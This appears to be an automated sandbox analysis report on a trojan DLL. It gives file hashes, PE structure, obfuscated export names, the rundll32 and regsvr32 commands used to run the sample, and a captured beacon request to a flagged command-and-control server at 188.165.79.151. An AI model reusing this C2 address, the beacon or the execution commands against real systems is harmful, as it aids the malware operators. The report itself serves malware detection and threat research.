                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                            153.247.2.0
                            unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                            IP
                            127.0.0.1
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:671666
                            Start date and time: 22/07/202213:14:592022-07-22 13:14:59 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:5CUFfVMSaQ (renamed file extension from none to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.evad.winDLL@20/5@0/27
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 88.8% (good quality ratio 83.1%)
                            • Quality average: 75.3%
                            • Quality standard deviation: 30.7%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.223.24.244
                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            13:16:54API Interceptor11x Sleep call for process: svchost.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8192
                            Entropy (8bit):0.3593198815979092
                            Encrypted:false
                            SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                            MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                            SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                            SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                            SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                            Malicious:false
                            Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MPEG-4 LOAS
                            Category:dropped
                            Size (bytes):1310720
                            Entropy (8bit):0.24947955525151602
                            Encrypted:false
                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4i:BJiRdwfu2SRU4i
                            MD5:1DF93142E07F403B10A2C717C0F36ACC
                            SHA1:C60DFCA92DFCF85A34BBC3680B975D9E7783BC71
                            SHA-256:547F0093516E49BA5ECF3E8A6861DD5A576C68B4778318EAEF931FA7E41464A2
                            SHA-512:6EF5C5E65D3E71DBAF680C15512EA9E1A0FA17D969D3C05959284E95FFDEAA87CFE3843D6FDA29B12646AB2E9C5DD675BFB81D5357C94B39ED7E2286EAC794BC
                            Malicious:false
                            Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x555eccf5, page size 16384, Windows version 10.0
                            Category:dropped
                            Size (bytes):786432
                            Entropy (8bit):0.2505532827291524
                            Encrypted:false
                            SSDEEP:384:zPw+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zPvSB2nSB2RSjlK/+mLesOj1J2
                            MD5:B108CC58B01CE88C345B14837CD712B0
                            SHA1:30AA6A7615EC2B8D56B5CA49FA5E6FEF86FAF139
                            SHA-256:F7999A41C300967BE907E519A2E5EFD39443BD0ACA3FAB73576820DD412CF11B
                            SHA-512:B2B89BFB7B0702D70C6F63BDAB2D989382DA1E9648D9254ED172596ACFA5002448DF170EEB7B10C06DF0E673A95F744F27AD38A083567DC83368606075311F1C
                            Malicious:false
                            Preview:U^..... ................e.f.3...w........................)..........zM.6....z..h.(..........zM...)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................I.....zM....................w.....zM.........................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.07330449171033379
                            Encrypted:false
                            SSDEEP:3:q//J7vTXnoAl/jo+c3wjtRnZl/all3Vkttlmlnl:qXJrUnHYRy3
                            MD5:B5E3E9AA630E00B392934C7C69EF4E06
                            SHA1:CE4A4F072F33A764CE095DC07EA5B1EC4BA59C36
                            SHA-256:48FD84925729F7BF36AFFB9EBD1DEF5889CCC44C8CC9D59E77DA798E4C4A598A
                            SHA-512:26709ED8D7400C8935CF6CC5D9914431FFD607E63348248D69D1B53C7E73DC358A60A0EB510D613B8DCE4518B5E5C052F00E5A7A4F51F88DEAE6D959CFEDCDF6
                            Malicious:false
                            Preview:?.)......................................3...w..6....z.......zM..............zM......zM.D2.......z.m...................w.....zM.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):55
                            Entropy (8bit):4.306461250274409
                            Encrypted:false
                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                            Malicious:false
                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Entropy (8bit):6.931234965672042
                            TrID:
                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                            • Win64 Executable (generic) (12005/4) 10.17%
                            • Generic Win/DOS Executable (2004/3) 1.70%
                            • DOS Executable Generic (2002/1) 1.70%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                            File name:5CUFfVMSaQ.dll
                            File size:691200
                            MD5:5d4728494832d03bbfb75367836fef4e
                            SHA1:abcbd283801a05390995862f59dcb5310f3d3d88
                            SHA256:caa60b9025dfba07efac6cae5438a8e20d9b7c210a721a4cf1f9d7b6df4d7d90
                            SHA512:89f38029d8cc4718af304e325a290294a000e68fea0d036fbe118cc04bd3ae5a676cab2dbc6ea4d1c53eeac804cd23756c01dce378a317cb683200365ad5079a
                            SSDEEP:12288:pBBKShhc/bQisqkxf3CJS+HQ58B6loNJYlvw9zaaxRHdAsxuvt3a1gYao3ovJK6S:bBHlvw9GanHrot3hoW
                            TLSH:45E4BE56ABE404B1E1B7D235C9128E81FAB3FC544724AB8B03E095B62F233AC557F716
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......b.........." ................d?.......................................0............ ........................................
                            Icon Hash:74f0e4ecccdce0e4
                            Entrypoint:0x180003f64
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x180000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                            DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT
                            Time Stamp:0x62BAE9E7 [Tue Jun 28 11:45:43 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:6cc0be0d01417a15b61c3b6a580e87ed
                            Instruction
                            dec eax
                            mov dword ptr [esp+08h], ebx
                            dec eax
                            mov dword ptr [esp+10h], esi
                            push edi
                            dec eax
                            sub esp, 20h
                            dec ecx
                            mov edi, eax
                            mov ebx, edx
                            dec eax
                            mov esi, ecx
                            cmp edx, 01h
                            jne 00007F4F7C9FE2F7h
                            call 00007F4F7C9FE314h
                            dec esp
                            mov eax, edi
                            mov edx, ebx
                            dec eax
                            mov ecx, esi
                            dec eax
                            mov ebx, dword ptr [esp+30h]
                            dec eax
                            mov esi, dword ptr [esp+38h]
                            dec eax
                            add esp, 20h
                            pop edi
                            jmp 00007F4F7C9FE184h
                            int3
                            int3
                            int3
                            dec eax
                            mov dword ptr [esp+20h], ebx
                            push ebp
                            dec eax
                            mov ebp, esp
                            dec eax
                            sub esp, 20h
                            dec eax
                            mov eax, dword ptr [0006E0C0h]
                            dec eax
                            mov ebx, 2DDFA232h
                            cdq
                            sub eax, dword ptr [eax]
                            add byte ptr [eax+3Bh], cl
                            ret
                            jne 00007F4F7C9FE366h
                            dec eax
                            and dword ptr [ebp+18h], 00000000h
                            dec eax
                            lea ecx, dword ptr [ebp+18h]
                            call dword ptr [0006741Ah]
                            dec eax
                            mov eax, dword ptr [ebp+18h]
                            dec eax
                            mov dword ptr [ebp+10h], eax
                            call dword ptr [0006738Ch]
                            mov eax, eax
                            dec eax
                            xor dword ptr [ebp+10h], eax
                            call dword ptr [00067370h]
                            mov eax, eax
                            dec eax
                            lea ecx, dword ptr [ebp+20h]
                            dec eax
                            xor dword ptr [ebp+10h], eax
                            call dword ptr [00067490h]
                            mov eax, dword ptr [ebp+20h]
                            dec eax
                            lea ecx, dword ptr [ebp+10h]
                            dec eax
                            shl eax, 20h
                            dec eax
                            xor eax, dword ptr [ebp+20h]
                            dec eax
                            xor eax, dword ptr [ebp+10h]
                            dec eax
                            xor eax, ecx
                            dec eax
                            mov ecx, FFFFFFFFh
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x69f180xe9d.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6adb50x50.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x890000x28080.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x750000x4620.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000x808.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5ed800x138.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x6b1b80x3b0.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x5c9660x5ca00False0.4055093412618084data6.495336903226537IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x5e0000x131740x13200False0.41204554738562094data5.399737438631881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x720000x28940xe00False0.15625data2.3008281540935718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0x750000x46200x4800False0.4896918402777778data5.7263789636668765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .00cfg0x7a0000x280x200False0.05859375data0.37171553503035126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .gehcont0x7b0000x500x200False0.130859375PGP\011Secret Sub-key -0.5546627733147627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .gxfg0x7c0000x9eb00xa000False0.336083984375data5.261757688277708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .retplne0x860000x5c0x200False0.087890625data0.8458487823546629
                            .voltbl0x870000x540x200False0.18359375data1.322754253639915
                            _RDATA0x880000xf40x200False0.314453125data1.9917660782863578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0x890000x280800x28200False0.8353168808411215data7.725336511078031IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xb20000x8080xa00False0.454296875data4.922299312910362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            RT_STRING0xb10380x48dataEnglishUnited States
                            RT_HTML0x892380x27e00dataEnglishUnited States
                            RT_MANIFEST0x890f00x143XML 1.0 document, ASCII textEnglishUnited States
                            DLLImport
                            GDI32.dllCreatePen, DeleteObject, LineTo, MoveToEx, Polyline, SelectObject
                            USER32.dllBeginPaint, CloseGestureInfoHandle, CreateWindowExW, DefWindowProcW, DestroyWindow, DispatchMessageW, EndPaint, GetGestureInfo, GetMessageW, InvalidateRect, LoadCursorW, LoadStringW, PostQuitMessage, RegisterClassExW, ScreenToClient, SetGestureConfig, ShowWindow, TranslateAcceleratorW, TranslateMessage, UpdateWindow
                            KERNEL32.dllCloseHandle, CompareStringW, CreateFileW, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetTimeFormatW, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, InterlockedFlushSList, InterlockedPushEntrySList, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, OutputDebugStringW, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwind, RtlUnwindEx, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, WideCharToMultiByte, WriteConsoleW, WriteFile
                            NameOrdinalAddress
                            ABeFtrnwmgAedx10x1800029d0
                            AEjATaIExpQg20x180002890
                            AbfBlUFQKbpevAFdaCpElBdscB30x180002200
                            AhCiOqhwyUiZbbsGncKmyLU40x1800026f0
                            AppWcUGsNPSALiojxbzmIncLqw50x1800028f0
                            BuDIuWLYHzeYLi60x180002260
                            BzspXLkN70x1800024f0
                            CAJbrnGzThPxKInHYeNbeiD80x180002980
                            CAizYoExRRpdPoWVbPYKFDwgiU90x180002800
                            DllRegisterServer100x180002170
                            DsznQIJtSEfpoaC110x1800022b0
                            DwKmpHIDu120x180002930
                            ECDzEWMCYJeoRkryuQOsYJpmq130x1800022e0
                            FAcdRHAWz140x180002610
                            FFgOwmblMRuJiEZKeYTYiuzs150x1800023f0
                            FGcNCKAIdduwyHBYG160x180002860
                            FrsmtxAdhb170x180002590
                            FycDPRFayBivcQtViJFBB180x180002320
                            GGGPAvQKBPbfXZZaHVp190x180002920
                            GKgyyDJNJDeNTLdDtczKsL200x180002340
                            GMWWgDWCipXlIkjHwoUVUkcYR210x1800026e0
                            GXJpVyiTrLHOne220x1800023d0
                            HJTFoxcPliQgvLgH230x180002820
                            HLCABIQMByMWBQl240x180002720
                            HSSmJwdyKCypI250x180002650
                            HuenqNYbiVIeAyMGFYkiYBPFpc260x180002770
                            IxremlDMjrvkDxgZfhGQZrk270x180002700
                            IxvOJTyBGbJYNRuYaPxjyAUmf280x180002380
                            JQPbXc290x180002270
                            JcMTbvPHZlumePpXUBhRJWcp300x180002350
                            JnZLIBBbkn310x1800025e0
                            JohOupoqASpLhYFLsyWn320x180002950
                            JwPmjlqZQXgHaQjgtKwKH330x180002940
                            LsCgTlMZDLwMutNSvzYIEdEhwL340x180002330
                            MPWJOPLDpgeYBymjBqgQIjmNoZ350x180002360
                            MXztYxhtX360x1800021f0
                            McniJoPJlmcEHlRCsaUz370x180002550
                            MhvpJKCzeAS380x180002620
                            MmBOoLzloNcLojEtz390x1800027a0
                            MoxtcCOHATssMTmiLf400x1800029e0
                            MpzzLNccslEpsqsI410x180002540
                            NqTxbmWhjf420x1800027e0
                            NsnrjJneCojFavepwQt430x180002430
                            OFTAEmNeIKkEpTykdZkNKIzp440x180002520
                            OguNFmV450x1800025f0
                            PXDdTdN460x1800026d0
                            PvWkibWuSiAacbZGzrkJUt470x1800021b0
                            QFGNloHdiwsP480x180002450
                            QOFKcQtiQXM490x180002830
                            QmukeRFviFO500x1800021a0
                            QupOoHScTGifO510x1800026a0
                            QyvetqDJywCLrVJLzofDOegxwP520x180002710
                            RmPpiUfGU530x180002750
                            SIkquaNCflVmESatNcndpdTlpe540x1800028d0
                            SfIHxYaArvTuFNrMVIbyX550x180002470
                            UWpelES560x180002880
                            UkLettFcomFXma570x180002990
                            VLdhIHLdMhyW580x1800025b0
                            VcULfipZVLXGKZRfrueex590x180002500
                            VqpcWzxeRjlVhQwQzv600x180002410
                            WBpPkPKcWeqGwAzzvNIH610x180002790
                            WEDyKrcivTPPlSwCwT620x180002370
                            WoptoKqfVNqOqwssFKVZfo630x180002670
                            XnGdCqyiMLdhVnMShSkq640x180002630
                            YMyyyHvdBObwWJjXdFk650x180002250
                            YihCWA660x180002530
                            YweLMeZukpQkvnZnYHkhCM670x180002780
                            ZLVzkIypQXUkzx680x180002900
                            ZSoNGzxKLdyqDghj690x180002640
                            ZkiQhRLkrjLkJNX700x180002730
                            ZmqtKkySX710x180002210
                            aPfqQAbMTzuJNp720x180002390
                            aehnZNNrhIsF730x1800029a0
                            amxdxgjfMZcXaFUifsfcvLXi740x1800022a0
                            bPfPnNT750x1800023a0
                            bubLuYEWIvIWsBNJTUOnl760x1800023e0
                            cTcqyCZyBDJvEFnsvQYDCOLAoT770x1800022f0
                            cYubuRW780x1800027f0
                            clFUgmrVuPSljrxXorVz790x180002230
                            dbMiEkrHbNnvlIaysX800x180002600
                            dgAUOlElUrm810x1800021d0
                            dxEatgtTYroSUkMiQaL820x180002220
                            eCkbiLnmCybWxEn830x180002440
                            efVluiugFvmsD840x1800029b0
                            exoEcLTZltlKDhXcTPLBLvM850x1800026b0
                            fAgLiyKNqrsT860x180002660
                            fEeZsQFKbuLaABrhuAbOhNj870x180002420
                            gYiNJrEBUixiSygWCLlsEf880x180002680
                            gpObsYCSb890x1800023c0
                            gtbMrIHBEjSZnmBWPb900x180002840
                            hCcvyzzlUZCYlRNZCTK910x1800027b0
                            hPDZNFuvABEgQeoD920x180002850
                            hsEYnjr930x180002460
                            iLEOjsJklFUGkNI940x1800025c0
                            iLjGFeOafkDi950x1800024d0
                            jcCPKYwgGqRpySHQKBnfIdayWD960x1800022c0
                            jjTWNPlegZljgiNVCWFLUDkFH970x180002280
                            kffHAP980x180002560
                            lUlTXKofnHgBxwxJLPdDPpCz990x1800028c0
                            lYaeKiHDZBLcjXyoPcEOBUc1000x1800024c0
                            lpGoEIn1010x1800023b0
                            mAtENYctTeMWWmtQ1020x180002760
                            mEiZkvnenxFVSgbXocseslt1030x1800028a0
                            mSkIHCWnxYjPAvLhkizRM1040x180002480
                            nciUfwCE1050x1800025a0
                            nfBvdBN1060x180002310
                            ngwzyo1070x180002960
                            njQxmJYMOWniVIJCxlqYaGwyco1080x180002290
                            pikxaDuNdKkEyUKlBLtRo1090x1800024b0
                            qYcNCgPzHhoixH1100x180002400
                            qbLCbNjvgZccfXANyoilYHLz1110x1800024a0
                            rIgvWBvLm1120x180002810
                            rMHLHjIymAUoTHNFdsfNPiQH1130x1800028b0
                            riiAnEEXhiFVUIdp1140x180002870
                            sCXUQoygEhYAvHSLAtQPOlI1150x180002910
                            sNgDDxTXeDBSWJVL1160x1800021c0
                            sjmfaFHjAYLiTOs1170x180002970
                            uFvBoQlDuBHPbcggfbqTz1180x180002240
                            uKxBgklrkubs1190x180002300
                            ueGFocoIB1200x180002690
                            ueINzYdzNpuGfNAPnf1210x1800029c0
                            vAVSflnhL1220x1800022d0
                            vJROvhiSqVeOiIsH1230x1800021e0
                            vfDcFWpsvSWqEKgMwpzmloZ1240x1800027c0
                            vzyObHl1250x1800027d0
                            wAavZUBVHJ1260x180002740
                            wCHWOvC1270x1800026c0
                            wQlVOK1280x1800028e0
                            wZFewnVovChWmNJWJDqUTvJm1290x180002580
                            wkraMphf1300x1800025d0
                            xkQCLrMtQvyCjJhPSdk1310x1800024e0
                            yYodwLnmm1320x180002510
                            ysdKIUzdVU1330x180002570
                            zFCiVYrpvmmXdRHTSKMcojyZb1340x180002490
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.5188.165.79.151497724432404320 07/22/22-13:16:45.923727TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149772443192.168.2.5188.165.79.151
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 22, 2022 13:16:45.396075964 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.396126986 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:45.396208048 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.415882111 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.415935040 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:45.538677931 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:45.538773060 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.919445038 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.919504881 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:45.920139074 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:45.920217991 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.923537970 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:45.964503050 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:46.333272934 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:46.333344936 CEST44349772188.165.79.151192.168.2.5
                            Jul 22, 2022 13:16:46.333456993 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:46.334310055 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:46.336334944 CEST49772443192.168.2.5188.165.79.151
                            Jul 22, 2022 13:16:46.336368084 CEST44349772188.165.79.151192.168.2.5
                            • 188.165.79.151
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549772188.165.79.151443C:\Windows\System32\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            2022-07-22 11:16:45 UTC0OUTGET / HTTP/1.1
                            Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==
                            Host: 188.165.79.151
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            2022-07-22 11:16:46 UTC0INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Fri, 22 Jul 2022 11:16:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            2022-07-22 11:16:46 UTC0INData Raw: 34 31 33 0d 0a 4f c9 a8 f9 d3 3a 1d d9 50 db be bb 14 90 45 c8 79 2a ea 93 97 fb b7 48 bf 22 da 80 a6 5a 66 b9 11 75 fe ae d6 76 5f e3 ae 83 2f df 3d 44 1e 64 f0 85 d7 3d 13 07 bd c8 b0 b0 f1 49 fc 12 6f 15 8c b4 32 88 a7 b2 99 23 62 bc 10 ba ca 3c 93 78 a8 69 ea ef f4 67 44 96 4f f8 70 a2 94 59 f2 74 66 44 2a aa 00 84 b3 52 ac 4d d5 ce fb aa 8a 4a 95 8a 2b 3c 53 d5 9a 26 e1 9a c3 92 f2 a2 b8 1b 0f 07 53 4f 69 17 2d 0a d6 6d 02 d0 d0 6b 04 fd a4 94 ed a4 61 58 a6 c5 f2 93 38 bf 05 9a 68 be f9 92 0c 8f 59 7a 45 59 15 0e 29 7e c0 06 4e 6a 38 43 aa 5b ea ff 37 1b 20 a6 1b 4b 31 4c 4f 4c ba 76 3d f9 fd fe 2e 0f 70 7e 3a ee 5c ad e9 f3 4b f9 d9 70 18 08 ba 6c 62 68 05 c4 95 97 70 25 f5 74 f2 9a d4 09 cf 07 ca 89 36 f4 fc 90 c9 fb db 48 85 2e 74 c2 8c 06 f9 e6
                            Data Ascii: 413O:PEy*H"Zfuv_/=Dd=Io2#b<xigDOpYtfD*RMJ+<S&SOi-mkaX8hYzEY)~Nj8C[7 K1LOLv=.p~:\Kplbhp%t6H.t


                            Click to jump to process

                            Target ID:0
                            Start time:13:16:30
                            Start date:22/07/2022
                            Path:C:\Windows\System32\loaddll64.exe
                            Wow64 process (32bit):false
                            Commandline:loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll"
                            Imagebase:0x7ff61ce00000
                            File size:140288 bytes
                            MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:1
                            Start time:13:16:30
                            Start date:22/07/2022
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                            Imagebase:0x7ff602050000
                            File size:273920 bytes
                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:2
                            Start time:13:16:30
                            Start date:22/07/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                            Imagebase:0x7ff6727f0000
                            File size:24064 bytes
                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
